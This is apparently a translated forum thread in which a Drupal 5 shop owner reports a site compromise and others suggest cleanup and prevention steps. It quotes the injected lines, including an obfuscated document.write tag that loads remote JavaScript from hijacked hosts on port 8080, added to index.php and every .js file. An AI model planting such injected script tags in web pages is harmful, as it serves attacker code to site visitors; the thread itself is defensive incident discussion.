Речь идет об интернет-магазине на базе Drupal 5.
Внезапно это перестало работать. При доступе к сайту возникла такая ошибка:
Ошибка синтаксического анализа: синтаксическая ошибка, неожиданный символ '<' в /home/public_html/index.php в строке 38
При дальнейшем осмотре я обнаружил следующие две строки в конце указанного index.php:
<script type="text/javascript" src="http://blog.nodisposable.com:8080/Hibernate.js"></script>
<!--7379ba6e55616ea66ac9d812fc0597ba-->
После удаления этих двух строк вручную сайт снова работает нормально.
Но после того, как было сообщено о других проблемах (с редактированием страниц), я обнаружил, что на самом деле все файлы * .js «заражены». Все они содержат лишнюю строку в конце:
document.write('<s'+'cript type="text/javascript" src="http://blog.nodisposable.com:8080/Hibernate.js"></scr'+'ipt>');
Этот сайт был взломан? При поиске в Google "blog.nodisposable.com" ничего интересного не появляется. Сам этот сайт кажется законным. Это наверное само взломано?
Кто-нибудь может объяснить, как это могло случиться? Что я могу сделать, чтобы это исправить? И что я могу сделать, чтобы этого избежать в будущем?
После восстановления резервной копии веб-сайта (не базы данных) это произошло снова, но теперь тег скрипта указывал на dolfy.sedonahyperbarics.com:8080/XHTML.js.
Судя по всему, было создано множество случайных учетных записей пользователей Drupal. Так что это может быть признаком того, что на самом деле это уязвимость Drupal.
Мы удалили их и ограничили создание учетных записей пользователей только администраторами (это должно было быть с самого начала, я знаю: -s). Мы также изменили пароль администратора на что-то более безопасный.
Будем надеяться, что сейчас он не вернется.
Если он был взломан, вы не знаете, был ли установлен черный ход.
Возможно, вам придется выполнить переустановку из заведомо исправной резервной копии после переформатирования.
Никогда не доверяйте системе, в которой был злоумышленник.
Чтобы предотвратить это в будущем, вам придется быть в курсе обновлений и подписаться на списки, которые будут в курсе уязвимостей и передовых методов работы с программным обеспечением, которое вы используете (списки drupal, списки безопасности вашей платформы и т. Д.) , а также заблокировать службы только для пользователей, которые необходимы для использования системы, используя безопасные пароли, ничего не делать в открытом виде и все остальное в соответствии с лучшими практиками безопасности, которые выходят далеко за рамки приведенного здесь ответа. И сохраняйте хорошие резервные копии и используйте систему обнаружения вторжений (например, систему, подобную Tripwire), чтобы проверять активность злоумышленников.
Хотя полностью основывается только на моем собственном опыте, каждый подобный взлом, особенно с повторным заражением, происходил из-за того, что кто-то с FTP-доступом к серверу заражал свой локальный компьютер и что-то крало учетные данные - вы хотите проверить журналы FTP и убедиться, что вы распознаете все IP-адреса и обновления как действительные - если что-то повторно заражается, вы должны довольно легко увидеть это там, если это так.
Я видел что-то очень похожее (почти идентичное), но не связанное с Drupal, и это определенно был взлом.
Как говорят другие, трудно узнать без дополнительной информации о вашем окружении. Чтобы заблокировать его обслуживание, вы можете быстро поместить в файл .htaccess директиву, которая будет отклонять или перенаправлять любые запросы к этому файлу .js.
Ага, боюсь, ты заражен. «Как», к сожалению, невозможно сказать без дополнительных затрат времени и усилий. Это могла быть уязвимость в вашей установке Drupal (или одном из его модулей), это могла быть уязвимость в другом приложении на том же сервере, это мог быть слабый (или украденный) пароль FTP и т. Д. возможных точек входа.